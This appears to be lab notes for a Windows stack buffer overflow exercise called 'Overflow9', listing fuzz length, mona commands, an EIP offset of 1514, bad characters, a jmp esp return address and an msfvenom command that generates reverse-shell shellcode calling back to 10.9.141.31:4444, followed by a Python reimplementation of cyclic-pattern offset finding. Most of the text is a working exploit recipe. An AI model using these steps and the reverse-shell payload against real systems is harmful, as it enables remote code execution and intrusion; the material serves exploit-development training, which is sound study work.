Overflow9

1. Fuzz the application to find the number of bytes needed to crash it

Bytes needed to crash the application: 1600

2. Set mona configuration

!mona config -set workingfolder c:\mona\%p

3. Find EIP offset

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1600

!mona findmsp -distance 1600

EIP offset: 1514

4. Find bad characters

!mona bytearray -b "\x00"

!mona compare -f C:\mona\oscp\bytearray.bin -a <ESP address>

Bad characters: \x00\x04\x3e\x3f\xe1

5. Find a jmp esp instruction whose address contains no bad characters

!mona jmp -r esp -cpb "\x00\x04\x3e\x3f\xe1"

Return address: 0x625011af

6. Generate shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=10.9.141.31 LPORT=4444 EXITFUNC=thread -b "\x00\x04\x3e\x3f\xe1" -f c

7. Fill the padding before the shellcode with a NOP sled
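
How step 3 works under the hood, as an added study example (not part of the original notes and not Metasploit's or mona's own code): the cyclic pattern is built from every uppercase/lowercase/digit triplet in nested-loop order, so the 4 bytes that land in EIP at the crash pin down exactly one position in the input. The 0x35794234 crash value below is constructed from the notes' own offset of 1514 in a 1600-byte pattern.

```python
# Study reimplementation of the cyclic-pattern technique behind step 3
# (pattern_create.rb / mona findmsp). Added example; not part of the original notes.
import string
import struct

# Metasploit's default character sets: the pattern is every 3-byte combination of
# one uppercase letter, one lowercase letter and one digit, in nested-loop order
# (Aa0 Aa1 ... Aa9 Ab0 ... Zz9). Within one full cycle (26*26*10*3 = 20280 bytes)
# no 4-byte window repeats, so any 4 bytes seen in EIP map to exactly one offset.
_UPPER, _LOWER, _DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
MAX_PATTERN_LEN = len(_UPPER) * len(_LOWER) * len(_DIGITS) * 3  # 20280


def pattern_create(length: int) -> bytes:
    """Return the first `length` bytes of the cyclic pattern."""
    if not 0 < length <= MAX_PATTERN_LEN:
        # Longer patterns repeat the cycle and lose uniqueness; out of scope here.
        raise ValueError(f"length must be 1..{MAX_PATTERN_LEN}")
    out = bytearray()
    for a in _UPPER:
        for b in _LOWER:
            for c in _DIGITS:
                out += (a + b + c).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)  # unreachable for valid lengths


def pattern_offset(pattern: bytes, eip: int) -> int:
    """Map the EIP value observed at the crash back to its position in `pattern`.

    x86 is little-endian: a register reading 0x35794234 was loaded from the
    bytes 34 42 79 35 ("4By5") as they sat on the stack, so pack the value
    little-endian before searching.
    """
    needle = struct.pack("<I", eip)
    idx = pattern.find(needle)
    if idx == -1:
        raise ValueError(f"EIP {eip:#010x} not found in pattern (not pattern-controlled?)")
    return idx


def crash_eip_for_offset(pattern: bytes, offset: int) -> int:
    """Inverse helper: the EIP value a crash overwriting at `offset` would show."""
    return struct.unpack("<I", pattern[offset:offset + 4])[0]


if __name__ == "__main__":
    pat = pattern_create(1600)               # same length as the notes
    eip = crash_eip_for_offset(pat, 1514)    # constructed crash value: 0x35794234
    print(f"EIP {eip:#010x} -> offset {pattern_offset(pat, eip)}")  # offset 1514
```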
